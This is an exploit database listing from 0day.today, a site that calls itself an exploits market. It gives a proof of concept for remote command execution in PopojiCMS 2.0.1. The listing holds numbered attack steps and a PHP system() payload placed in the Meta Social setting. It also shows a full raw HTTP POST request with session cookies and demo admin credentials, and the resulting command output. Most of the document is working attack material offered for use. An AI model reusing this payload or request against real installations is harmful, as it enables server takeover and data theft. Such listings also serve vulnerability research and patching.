[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PopojiCMS 2.0.1 Remote Command Execution Vulnerability

Author
tmrswrr
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-39167
Category
web applications
Date add
28-11-2023
Platform
php
# Exploit Title: PopojiCMS Version : 2.0.1  Remote Command Execution
# Date: 27/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.popojicms.org/
# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip
# Version: Version : 2.0.1
# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS

##POC:

1 ) Login with admin cred and click settings
2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?>
3 ) Open main page , you will be see id command result 


POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1
Host: demos5.softaculous.com
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=setting
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: https://demos5.softaculous.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

meta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3E

Result: 

uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

#  0day.today [2024-11-16]  #